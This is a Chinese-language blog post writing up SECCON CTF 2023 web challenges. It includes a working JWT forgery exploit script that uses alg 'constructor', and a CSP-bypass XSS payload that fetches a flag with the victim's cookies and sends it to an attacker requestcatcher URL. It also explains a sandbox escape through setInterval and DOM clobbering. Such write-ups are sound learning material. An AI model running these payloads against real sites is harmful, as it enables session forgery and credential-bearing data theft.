<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://unpkg.com/@fortawesome/fontawesome-free@6.2.1/css/all.min.css" integrity="sha256-Z1K5uhUaJXA7Ll0XrZ/0JhX4lAtZFpT6jkKrEDT0drU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://unpkg.com/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"gudiffany.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.14.2","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="2023SECCONCTF">
<meta property="og:type" content="article">
<meta property="og:title" content="2023SECCONCTF">
<meta property="og:url" content="https://gudiffany.github.io/2023/09/18/16-34-28/index.html">
<meta property="og:site_name" content="diffany">
<meta property="og:description" content="2023SECCONCTF">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gudiffany.github.io/img/image-20230918165615331.png">
<meta property="og:image" content="https://gudiffany.github.io/img/image-20230918165017214.png">
<meta property="og:image" content="https://gudiffany.github.io/img/image-20230918172944995.png">
<meta property="article:published_time" content="2023-09-18T08:34:28.000Z">
<meta property="article:modified_time" content="2023-10-04T09:32:44.925Z">
<meta property="article:author" content="diffany">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gudiffany.github.io/img/image-20230918165615331.png">


<link rel="canonical" href="https://gudiffany.github.io/2023/09/18/16-34-28/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://gudiffany.github.io/2023/09/18/16-34-28/","path":"2023/09/18/16-34-28/","title":"2023SECCONCTF"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>2023SECCONCTF | diffany</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">diffany</p>
      <i class="logo-line"></i>
    </a>
      <img class="custom-logo-image" src="/uploads/custom-logo.png" alt="diffany">
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-友情链接"><a href="/friend/" rel="section"><i class="fa fa-sitemap fa-fw"></i>友情链接</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2023SECCONCTF"><span class="nav-number">1.</span> <span class="nav-text">2023SECCONCTF</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#web"><span class="nav-number">1.1.</span> <span class="nav-text">web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Bad-JWT"><span class="nav-number">1.1.1.</span> <span class="nav-text">Bad-JWT</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#simple-calc"><span class="nav-number">1.1.2.</span> <span class="nav-text">simple-calc</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#blink"><span class="nav-number">1.1.3.</span> <span class="nav-text">blink</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#eeeeejs"><span class="nav-number">1.1.4.</span> <span class="nav-text">eeeeejs</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">diffany</p>
  <div class="site-description" itemprop="description">一个努力学习的菜鸟</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">30</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="https://unpkg.com/@creativecommons/vocabulary@2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>

        </div>
      </div>
    </div>

    
        <div class="pjax">
        </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://gudiffany.github.io/2023/09/18/16-34-28/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="diffany">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="diffany">
      <meta itemprop="description" content="一个努力学习的菜鸟">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="2023SECCONCTF | diffany">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2023SECCONCTF<a href="https://github.com/user-name/repo-name/tree/branch-name/subdirectory-name/_posts/2023SECCONCTF.md" class="post-edit-link" title="编辑" rel="noopener" target="_blank"><i class="fa fa-pen-nib"></i></a>
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-09-18 16:34:28" itemprop="dateCreated datePublished" datetime="2023-09-18T16:34:28+08:00">2023-09-18</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-10-04 17:32:44" itemprop="dateModified" datetime="2023-10-04T17:32:44+08:00">2023-10-04</time>
    </span>

  
    <span id="/2023/09/18/16-34-28/" class="post-meta-item leancloud_visitors" data-flag-title="2023SECCONCTF" title="阅读次数">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span class="leancloud-visitors-count"></span>
    </span>
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="2023SECCONCTF"><a href="#2023SECCONCTF" class="headerlink" title="2023SECCONCTF"></a>2023SECCONCTF</h1><span id="more"></span>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="Bad-JWT"><a href="#Bad-JWT" class="headerlink" title="Bad-JWT"></a>Bad-JWT</h3><p>参考连接：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/xryuseix/CTF_Writeups/tree/master/SECCON2023">https://github.com/xryuseix/CTF_Writeups/tree/master/SECCON2023</a></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> <span class="title function_">createSignature</span> = (<span class="params">header, payload, secret</span>) =&gt; &#123;</span><br><span class="line">	<span class="keyword">const</span> data = <span class="string">`<span class="subst">$&#123;stringifyPart(header)&#125;</span>.<span class="subst">$&#123;stringifyPart(payload)&#125;</span>`</span>;</span><br><span class="line">	<span class="keyword">const</span> signature = algorithms[header.<span class="property">alg</span>.<span class="title function_">toLowerCase</span>()](data, secret);</span><br><span class="line">	<span class="keyword">return</span> signature;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>algorithms[]</code>这里直接使用的是对algorithms属性的调用</p>
<p><img src="/img/image-20230918165615331.png" alt="image-20230918165615331"></p>
<p>在这里存在一个<code>constructor</code>属性，这个属性调用之后回直接返回一个Function，实际上就是这个具体对象的构造函数，然后对其调用，实际上只会返回第一个参数(原理上就是获得了原型，然后进行了初始化，返回对象，参考java反射，类似，但是还是有一点不一样)</p>
<p><img src="/img/image-20230918165017214.png" alt="image-20230918165017214"></p>
<p>然后参考wp调试一下，实际上得到的是一个String对象</p>
<p><img src="/img/image-20230918172944995.png" alt="image-20230918172944995"></p>
<p>然后对于对比<code>compare</code>来说，字符串和字符串对象是相同的</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> txt = <span class="keyword">new</span> <span class="title class_">String</span>(<span class="string">&quot;aaaaaaaaaaaaaaaa&quot;</span>);</span><br><span class="line"><span class="title class_">Buffer</span>.<span class="title function_">compare</span>(<span class="title class_">Buffer</span>.<span class="title function_">from</span>(txt, <span class="string">&quot;base64&quot;</span>), <span class="title class_">Buffer</span>.<span class="title function_">from</span>(<span class="string">&quot;aaaaaaaaaaaaaaaa&quot;</span>, <span class="string">&quot;base64&quot;</span>));</span><br></pre></td></tr></table></figure>
<p>所以直接把调试的字符串拼接到后面</p>
<p>然后<code>Buffer.from(txt, &quot;base64&quot;)</code>，不会解析不是base64的字符串，所以直接去除<code>.</code>即可，满足分割出来三段的条件</p>
<p>贴一下大佬的exp</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">header = &#123;<span class="string">&quot;typ&quot;</span>: <span class="string">&quot;JWT&quot;</span>, <span class="string">&quot;alg&quot;</span>: <span class="string">&quot;constructor&quot;</span>&#125;</span><br><span class="line">headerStr = json.<span class="title function_">dumps</span>(header).<span class="title function_">encode</span>(<span class="string">&quot;utf-8&quot;</span>)</span><br><span class="line">body = &#123;<span class="string">&quot;isAdmin&quot;</span>: <span class="title class_">True</span>&#125;</span><br><span class="line">bodyStr = json.<span class="title function_">dumps</span>(body).<span class="title function_">encode</span>(<span class="string">&quot;utf-8&quot;</span>)</span><br><span class="line"></span><br><span class="line">def <span class="title function_">base64_encode</span>(<span class="attr">str</span>: str):</span><br><span class="line">    <span class="keyword">return</span> (</span><br><span class="line">        base64.<span class="title function_">b64encode</span>(str).<span class="title function_">replace</span>(b<span class="string">&quot;=&quot;</span>, b<span class="string">&quot;&quot;</span>).<span class="title function_">replace</span>(b<span class="string">&quot;+&quot;</span>, b<span class="string">&quot;-&quot;</span>).<span class="title function_">replace</span>(b<span class="string">&quot;/&quot;</span>, b<span class="string">&quot;_&quot;</span>)</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">headerBase64 = <span class="title function_">str</span>(<span class="title function_">base64_encode</span>(headerStr))[<span class="number">2</span>:-<span class="number">1</span>]</span><br><span class="line">bodyBase64 = <span class="title function_">str</span>(<span class="title function_">base64_encode</span>(bodyStr))[<span class="number">2</span>:-<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line">jwt = f<span class="string">&quot;&#123;headerBase64&#125;.&#123;bodyBase64&#125;.eyJ0eXAiOiJKV1QiLCJhbGciOiJjb25zdHJ1Y3RvciJ9eyJpc0FkbWluIjp0cnVlfQ&quot;</span></span><br><span class="line"><span class="title function_">print</span>(jwt)</span><br><span class="line">res = requests.<span class="title function_">get</span>(<span class="string">&quot;http://localhost:3000/&quot;</span>, cookies=&#123;<span class="string">&quot;session&quot;</span>: jwt&#125;)</span><br><span class="line"></span><br><span class="line"><span class="title function_">print</span>(res.<span class="property">text</span>)</span><br></pre></td></tr></table></figure>
<h3 id="simple-calc"><a href="#simple-calc" class="headerlink" title="simple-calc"></a>simple-calc</h3><p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://blog.task4233.dev/posts/writeup-seccon-ctf-2023/?ref=www.ctfiot.com">https://blog.task4233.dev/posts/writeup-seccon-ctf-2023/?ref=www.ctfiot.com</a></p>
<p>对于绕过CSP，可以使用参数过长的方法进行绕过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">target_url = <span class="string">&quot;http://127.0.0.1:3000&quot;</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;a&quot;</span> * <span class="number">30000</span></span><br><span class="line">params = &#123;</span><br><span class="line">    <span class="string">&quot;expr&quot;</span>: payload,</span><br><span class="line">&#125;</span><br><span class="line">resp = requests.get(target_url, params=params)</span><br><span class="line"><span class="built_in">print</span>(resp.headers)</span><br><span class="line"><span class="built_in">print</span>(resp.text)</span><br><span class="line"><span class="built_in">print</span>(resp.status_code)</span><br></pre></td></tr></table></figure>
<p>此时将会返回431错误，然后就成功使得CSP失效了，然后使用iframe外带数据</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> urllib.parse <span class="keyword">import</span> urlencode</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">target_url = <span class="string">&quot;http://127.0.0.1:3000&quot;</span></span><br><span class="line">attacker_url = <span class="string">&quot;https://asdasd.requestcatcher.com/test&quot;</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">f&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">var i=document.createElement(&#x27;iframe&#x27;);</span></span><br><span class="line"><span class="string">i.src = `/js/index.js?expr=$&#123;&#123;&#x27;a&#x27;.repeat(20000)&#125;&#125;`;</span></span><br><span class="line"><span class="string">i.onload = () =&gt; &#123;&#123;</span></span><br><span class="line"><span class="string">i.contentWindow.fetch(&#x27;/flag&#x27;, &#123;&#123;headers: &#123;&#123;&#x27;X-FLAG&#x27;: true&#125;&#125;, credentials: &#x27;include&#x27;&#125;&#125;).then(res=&gt;res.text()).then(res=&gt;location.href=&#x27;<span class="subst">&#123;attacker_url&#125;</span>?q=&#x27;+res);</span></span><br><span class="line"><span class="string">&#125;&#125;;</span></span><br><span class="line"><span class="string">document.body.appendChild(i);</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">payload = urlencode(&#123;<span class="string">&quot;expr&quot;</span>: payload&#125;)</span><br><span class="line">resp = requests.post(</span><br><span class="line">    <span class="string">f&quot;<span class="subst">&#123;target_url&#125;</span>/report&quot;</span>,</span><br><span class="line">    headers=&#123;<span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;application/x-www-form-urlencoded&quot;</span>&#125;,</span><br><span class="line">    data=payload,</span><br><span class="line">)</span><br></pre></td></tr></table></figure>
<p>解释一下payload</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> i=<span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&#x27;iframe&#x27;</span>);</span><br><span class="line">i.<span class="property">src</span> = <span class="string">`/js/index.js?expr=<span class="subst">$&#123;&#123;<span class="string">&#x27;a&#x27;</span>.repeat(<span class="number">20000</span>)&#125;&#125;</span>`</span>;</span><br></pre></td></tr></table></figure>
<p>这两句将会创建iframe元素，然后访问src，然后在访问之后</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">i.<span class="property">onload</span> = <span class="function">() =&gt;</span> &#123;&#123;</span><br><span class="line">i.<span class="property">contentWindow</span>.<span class="title function_">fetch</span>(<span class="string">&#x27;/flag&#x27;</span>, &#123;&#123;<span class="attr">headers</span>: &#123;&#123;<span class="string">&#x27;X-FLAG&#x27;</span>: <span class="literal">true</span>&#125;&#125;, <span class="attr">credentials</span>: <span class="string">&#x27;include&#x27;</span>&#125;&#125;).<span class="title function_">then</span>(<span class="function"><span class="params">res</span>=&gt;</span>res.<span class="title function_">text</span>()).<span class="title function_">then</span>(<span class="function"><span class="params">res</span>=&gt;</span>location.<span class="property">href</span>=<span class="string">&#x27;&#123;attacker_url&#125;?q=&#x27;</span>+res);</span><br><span class="line">&#125;&#125;;</span><br></pre></td></tr></table></figure>
<p><code>i.onload</code>将会设置一个事件处理程序，当<code>&lt;iframe&gt;</code>带有该变量的元素<code>i</code>完成加载时将触发该事件处理程序。</p>
<p>在事件处理程序内部，它使用API 向（iframe 的内容）<code>fetch</code>内的“/flag”URL 发出 GET 请求。<code>i.contentWindow</code>它包含值为 true 的“X-FLAG”标头并设置<code>credentials</code>为“include”，这意味着它将在请求中包含 cookie 和 HTTP 身份验证凭据。</p>
<p>提取请求的响应应该是文本，然后它使用查询参数“?q=”将文本响应附加到当前 URL (location.href)，并将当前页面重定向到这个新 URL。</p>
<p><code>then(res =&gt; location.href = &#39;&#123;attacker_url&#125;?q=&#39; + res)</code>：在上一个<code>.then()</code>链将响应转换为文本之后，这部分代码将获取结果文本（来自“/flag”的响应）并使用它来构造新的 URL。</p>
<p><code>location.href = ...</code>：最后，它将<code>location.href</code>当前页面的 设置为新构造的 URL。</p>
<p>验证一下</p>
<p>i.html</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">      <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="number">111</span>);</span></span><br><span class="line"><span class="language-javascript">  </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>index.html</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">&quot;test()&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">test</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">var</span> iframe = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;iframe&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">      iframe.<span class="property">src</span> = <span class="string">&quot;i.html&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">      iframe.<span class="property">onload</span> = <span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="number">222</span>);</span></span><br><span class="line"><span class="language-javascript">      &#125;;</span></span><br><span class="line"><span class="language-javascript">      <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(iframe);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">  </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>然后使用live server建环境，避免插件以及同源问题</p>
<h3 id="blink"><a href="#blink" class="headerlink" title="blink"></a>blink</h3><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> sandboxAttribute = [</span><br><span class="line">  <span class="string">&quot;allow-downloads&quot;</span>,</span><br><span class="line">  <span class="string">&quot;allow-forms&quot;</span>,</span><br><span class="line">  <span class="string">&quot;allow-modals&quot;</span>,</span><br><span class="line">  <span class="string">&quot;allow-orientation-lock&quot;</span>,</span><br><span class="line">  <span class="string">&quot;allow-pointer-lock&quot;</span>,</span><br><span class="line">  <span class="string">&quot;allow-popups&quot;</span>,</span><br><span class="line">  <span class="string">&quot;allow-popups-to-escape-sandbox&quot;</span>,</span><br><span class="line">  <span class="string">&quot;allow-presentation&quot;</span>,</span><br><span class="line">  <span class="string">&quot;allow-same-origin&quot;</span>,</span><br><span class="line">  <span class="comment">// &quot;allow-scripts&quot;, // disallow</span></span><br><span class="line">  <span class="string">&quot;allow-top-navigation&quot;</span>,</span><br><span class="line">  <span class="string">&quot;allow-top-navigation-by-user-activation&quot;</span>,</span><br><span class="line">  <span class="string">&quot;allow-top-navigation-to-custom-protocols&quot;</span>,</span><br><span class="line">].<span class="title function_">join</span>(<span class="string">&quot; &quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="title function_">createBlink</span> = <span class="keyword">async</span> (<span class="params">html</span>) =&gt; &#123;</span><br><span class="line">  <span class="keyword">const</span> sandbox = <span class="title function_">wrap</span>(</span><br><span class="line">    $(<span class="string">&quot;#viewer&quot;</span>).<span class="title function_">appendChild</span>(<span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;iframe&quot;</span>))</span><br><span class="line">  );</span><br><span class="line"></span><br><span class="line">  <span class="comment">// I believe it is impossible to escape this iframe sandbox...</span></span><br><span class="line">  sandbox.<span class="property">sandbox</span> = sandboxAttribute;</span><br><span class="line"></span><br><span class="line">  sandbox.<span class="property">width</span> = <span class="string">&quot;100%&quot;</span>;</span><br><span class="line">  sandbox.<span class="property">srcdoc</span> = html;</span><br><span class="line">  <span class="keyword">await</span> <span class="keyword">new</span> <span class="title class_">Promise</span>(<span class="function">(<span class="params">resolve</span>) =&gt;</span> (sandbox.<span class="property">onload</span> = resolve));</span><br><span class="line"></span><br><span class="line">  <span class="keyword">const</span> target = <span class="title function_">wrap</span>(sandbox.<span class="property">contentDocument</span>.<span class="property">body</span>);</span><br><span class="line">  target.<span class="property">popover</span> = <span class="string">&quot;manual&quot;</span>;</span><br><span class="line">  <span class="keyword">const</span> id = <span class="built_in">setInterval</span>(target.<span class="property">togglePopover</span>, <span class="number">400</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="function">() =&gt;</span> &#123;</span><br><span class="line">    <span class="built_in">clearInterval</span>(id);</span><br><span class="line">    sandbox.<span class="title function_">remove</span>();</span><br><span class="line">  &#125;;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>首先会通过sandbox使得iframe失去作用，并且无法使用任何js脚本</p>
<p>但是<code>setInterval</code>在使用字符串作为参数的时候，起到的作用跟eval是一样的，所以通过污染<code>sandbox.contentDocument.body</code>绕过第一层，然后通过id设置<code>togglePopover</code>来使得setInterval的成功执行</p>
<p><a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-xss#sinks-2">https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-xss#sinks-2</a></p>
<p>所以需要使用iframe通过waf然后设置name=body成功注入target，然后根据srcdoc</p>
<p>以及根据id设置，a标签的使用，生成对应的html代码</p>
